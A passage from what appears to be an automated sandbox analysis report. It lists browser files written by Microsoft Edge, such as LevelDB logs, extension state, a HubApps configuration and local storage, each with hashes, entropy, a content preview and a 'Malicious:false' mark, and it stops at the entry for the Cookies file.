                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):328
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.115311223075755
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6uvVdq2P923oH+Tcwt865IFUtQuvXhFZZmwuuvXhFzkwO923oH+Tcwt86+ULJ:76uvVdv4Yeb/WFUtQuvXhFZ/uuvXhFzB
                                                                                                                                                                                                                                                                                                                          MD5:C85AE05D29E9863C87AA576F29AEE724
                                                                                                                                                                                                                                                                                                                          SHA1:793381FF91286661E6B495F543C52A08212D37B6
                                                                                                                                                                                                                                                                                                                          SHA-256:A6D2B566DBBD3DAFAAFAFF721A35E2F4464801D67CF488DF265A43CCE7F92091
                                                                                                                                                                                                                                                                                                                          SHA-512:16FF102859CBE4A9A8F5A7C58D681CE3E494FC9B56CE0CC6EC8578E9A99ABBE99BC6AF3F82846240A6331E4284F64D937CE68D98EC37C0927F145BB06DFAFDCB
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.242 1c90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/12-11:23:05.243 1c90 Recovering log #3.2025/01/12-11:23:05.243 1c90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):328
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.115311223075755
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6uvVdq2P923oH+Tcwt865IFUtQuvXhFZZmwuuvXhFzkwO923oH+Tcwt86+ULJ:76uvVdv4Yeb/WFUtQuvXhFZ/uuvXhFzB
                                                                                                                                                                                                                                                                                                                          MD5:C85AE05D29E9863C87AA576F29AEE724
                                                                                                                                                                                                                                                                                                                          SHA1:793381FF91286661E6B495F543C52A08212D37B6
                                                                                                                                                                                                                                                                                                                          SHA-256:A6D2B566DBBD3DAFAAFAFF721A35E2F4464801D67CF488DF265A43CCE7F92091
                                                                                                                                                                                                                                                                                                                          SHA-512:16FF102859CBE4A9A8F5A7C58D681CE3E494FC9B56CE0CC6EC8578E9A99ABBE99BC6AF3F82846240A6331E4284F64D937CE68D98EC37C0927F145BB06DFAFDCB
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.242 1c90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/12-11:23:05.243 1c90 Recovering log #3.2025/01/12-11:23:05.243 1c90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1254
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                                          MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                                          SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                                          SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                                          SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):324
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.102210559118586
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6u9+q2P923oH+Tcwt8NIFUtQu2WZmwuu9VkwO923oH+Tcwt8+eLJ:76u9+v4YebpFUtQu2W/uu9V5LYebqJ
                                                                                                                                                                                                                                                                                                                          MD5:B8E205E35A9C8C3BD93CDC24233B7D0D
                                                                                                                                                                                                                                                                                                                          SHA1:6955C14E46238C78CAED4B3AC3B11887A402159C
                                                                                                                                                                                                                                                                                                                          SHA-256:7B0C2883C8882580E0EB296514D4F65931A99382BD7B5B3E0D03A89B0523FD00
                                                                                                                                                                                                                                                                                                                          SHA-512:FCF428DD991717B3229690B388511FB3C32E9B222BCACAE9EA9CD2E0DBBCDFAA1C456EACE99543456DA75370D3DA85B006B686D7D413897C6955711EBE5FC507
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.939 1fcc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/12-11:23:05.939 1fcc Recovering log #3.2025/01/12-11:23:05.939 1fcc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):324
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.102210559118586
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6u9+q2P923oH+Tcwt8NIFUtQu2WZmwuu9VkwO923oH+Tcwt8+eLJ:76u9+v4YebpFUtQu2W/uu9V5LYebqJ
                                                                                                                                                                                                                                                                                                                          MD5:B8E205E35A9C8C3BD93CDC24233B7D0D
                                                                                                                                                                                                                                                                                                                          SHA1:6955C14E46238C78CAED4B3AC3B11887A402159C
                                                                                                                                                                                                                                                                                                                          SHA-256:7B0C2883C8882580E0EB296514D4F65931A99382BD7B5B3E0D03A89B0523FD00
                                                                                                                                                                                                                                                                                                                          SHA-512:FCF428DD991717B3229690B388511FB3C32E9B222BCACAE9EA9CD2E0DBBCDFAA1C456EACE99543456DA75370D3DA85B006B686D7D413897C6955711EBE5FC507
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.939 1fcc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/12-11:23:05.939 1fcc Recovering log #3.2025/01/12-11:23:05.939 1fcc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):429
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                                          MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                                          SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                                          SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                                          SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                                                          Size (bytes):8720
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.2181161368834022
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:6lljtFlljq7A/mhWJFuQ3yy7IOWUut4dweytllrE9SFcTp4AGbNCV9RUINr:6/I75fOkt4d0Xi99pEYPr
                                                                                                                                                                                                                                                                                                                          MD5:D55954E40030BA9687758CA7965B5CAE
                                                                                                                                                                                                                                                                                                                          SHA1:E8DDD3804B1AC87473263D8E0900A62B0F3E0319
                                                                                                                                                                                                                                                                                                                          SHA-256:E10D93B55541B2D52B46A1C9D5789DDA6297DAD90E59E93396D9563EB5AD827B
                                                                                                                                                                                                                                                                                                                          SHA-512:40F17F20091CC487AC928FCD7DC88CDCFD9F9C70CD1199ED64B70876F28A9C483E82839F07931A3FB4DB9159E8A14E116A9AEFF0E59914BCE34CD5EB629F8024
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:..............d....&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):115717
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                          MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                          SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                          SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                          SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):49152
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.6481262007522295
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:384:aj9P0LEcAjlrP/KbtpQkQerE773pL9hCgam6ItRKToaAu:adyKlrP/se2E7Pv9RKcC
                                                                                                                                                                                                                                                                                                                          MD5:DF0D2FCFE368ECEEB78C13B004DAEDBD
                                                                                                                                                                                                                                                                                                                          SHA1:1E9121546F3F0758130C2A37F274C56BCE00B702
                                                                                                                                                                                                                                                                                                                          SHA-256:91ED1A0AB9A23419FBD76C4A2435EDC1CCBAB5FC481528342F34159558CA8ABB
                                                                                                                                                                                                                                                                                                                          SHA-512:13179A41D9084C4778EFD801A91E2D18B87C5BA662BF08170564DEB9742BD0F93B00D538413B6E6A8D38171E7EFC190E17EAB09C3B396835FC02E9F6A2E5E474
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):408
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2514575839803666
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:76uiFqv4Yeb8rcHEZrELFUtQux/uur5LYeb8rcHEZrEZSJ:76uL4Yeb8nZrExgQuEu9LYeb8nZrEZe
                                                                                                                                                                                                                                                                                                                          MD5:331FF322FD130132E5C0829D59AB4A89
                                                                                                                                                                                                                                                                                                                          SHA1:B47B5D506983DB4A024E1904AD110D3638E7A098
                                                                                                                                                                                                                                                                                                                          SHA-256:2ED72C2AD949E8FF10B6CD45924F48C5669F305EA7D469A5C2F541F13ED06966
                                                                                                                                                                                                                                                                                                                          SHA-512:91A0F3C05BF21BA93B0B611B9A76D524785659EEEE6A15F9E5699D0835A454CE2DA65617C21F190CD81A4C1335983CE4E5D7C39E6F61913AC0BF31EC6AE08682
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:09.096 1fc4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/12-11:23:09.097 1fc4 Recovering log #3.2025/01/12-11:23:09.097 1fc4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):408
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2514575839803666
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:76uiFqv4Yeb8rcHEZrELFUtQux/uur5LYeb8rcHEZrEZSJ:76uL4Yeb8nZrExgQuEu9LYeb8nZrEZe
                                                                                                                                                                                                                                                                                                                          MD5:331FF322FD130132E5C0829D59AB4A89
                                                                                                                                                                                                                                                                                                                          SHA1:B47B5D506983DB4A024E1904AD110D3638E7A098
                                                                                                                                                                                                                                                                                                                          SHA-256:2ED72C2AD949E8FF10B6CD45924F48C5669F305EA7D469A5C2F541F13ED06966
                                                                                                                                                                                                                                                                                                                          SHA-512:91A0F3C05BF21BA93B0B611B9A76D524785659EEEE6A15F9E5699D0835A454CE2DA65617C21F190CD81A4C1335983CE4E5D7C39E6F61913AC0BF31EC6AE08682
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:09.096 1fc4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/12-11:23:09.097 1fc4 Recovering log #3.2025/01/12-11:23:09.097 1fc4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1600
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.589247332906856
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:6Z4YuW8WCXZGWV03Sx49RHHS2/48ylsQhyG:6vuVWQ0MeTQ8osM
                                                                                                                                                                                                                                                                                                                          MD5:FEF68719FDD61DB34E59BB5B45585B90
                                                                                                                                                                                                                                                                                                                          SHA1:FB7E5C3DEC7AAC4FEA4F6CBD8D258CDB997FF75B
                                                                                                                                                                                                                                                                                                                          SHA-256:D0F09C1CF3E06203867354DE8D1A7CF5D6B1EDC3D3FFDC9E2659031FAD77BA90
                                                                                                                                                                                                                                                                                                                          SHA-512:F6F6211F105F0AC112EC1E483C7156872CCD11BF27A4C8532FCC74D2D55C4B74237CBC8483FFF6297BDC70D7F569EF2B94419096B5C943FD0DB60317F36AF04D
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:...9................VERSION.1..META:https://ntp.msn.com............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":370}.!_https://ntp.msn.com..LastKnownPV..1736698993186.-_https://ntp.msn.com..LastVisuallyReadyMarker..1736698994208.._https://ntp.msn.com..MUID!.0DA5835E35016A581E46962C34736B24.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1736698993253,"schedule":[4,-1,34,-1,-1,-1,12],"scheduleFixed":[4,-1,34,-1,-1,-1,12],"simpleSchedule":[26,47,22,23,37,44,19]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1736698993158.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20250110.471"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):333
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.091662443254109
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6uvHAq2P923oH+Tcwt8a2jMGIFUtQuMZmwuuezkwO923oH+Tcwt8a2jMmLJ:76uvHAv4Yeb8EFUtQuM/uuG5LYeb8bJ
                                                                                                                                                                                                                                                                                                                          MD5:8251B55A952EA7076567D3CA1D6B82D7
                                                                                                                                                                                                                                                                                                                          SHA1:389F121A479867E79464D14A2E5928CF4118DD86
                                                                                                                                                                                                                                                                                                                          SHA-256:71A27FE9DED76DAA7DC8682E995206595CDCF9BE07CCD45EC1FCC3B823F1E55C
                                                                                                                                                                                                                                                                                                                          SHA-512:EBAA41159A789D4A9FCECD2368DA81E09C91563853A8A1753F39D61CA0A69A48E0FBE40D6E64312C1993E3C9253E60688D52B14B1D899ADDBD682FFD89E68899
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.514 bb0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/12-11:23:05.515 bb0 Recovering log #3.2025/01/12-11:23:05.517 bb0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):333
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.091662443254109
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6uvHAq2P923oH+Tcwt8a2jMGIFUtQuMZmwuuezkwO923oH+Tcwt8a2jMmLJ:76uvHAv4Yeb8EFUtQuM/uuG5LYeb8bJ
                                                                                                                                                                                                                                                                                                                          MD5:8251B55A952EA7076567D3CA1D6B82D7
                                                                                                                                                                                                                                                                                                                          SHA1:389F121A479867E79464D14A2E5928CF4118DD86
                                                                                                                                                                                                                                                                                                                          SHA-256:71A27FE9DED76DAA7DC8682E995206595CDCF9BE07CCD45EC1FCC3B823F1E55C
                                                                                                                                                                                                                                                                                                                          SHA-512:EBAA41159A789D4A9FCECD2368DA81E09C91563853A8A1753F39D61CA0A69A48E0FBE40D6E64312C1993E3C9253E60688D52B14B1D899ADDBD682FFD89E68899
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.514 bb0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/12-11:23:05.515 bb0 Recovering log #3.2025/01/12-11:23:05.517 bb0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\1db31466-7129-48a8-9a93-ce5304cb856d.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\29255410-71ec-4f7f-bc8f-20fc19c9d42e.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
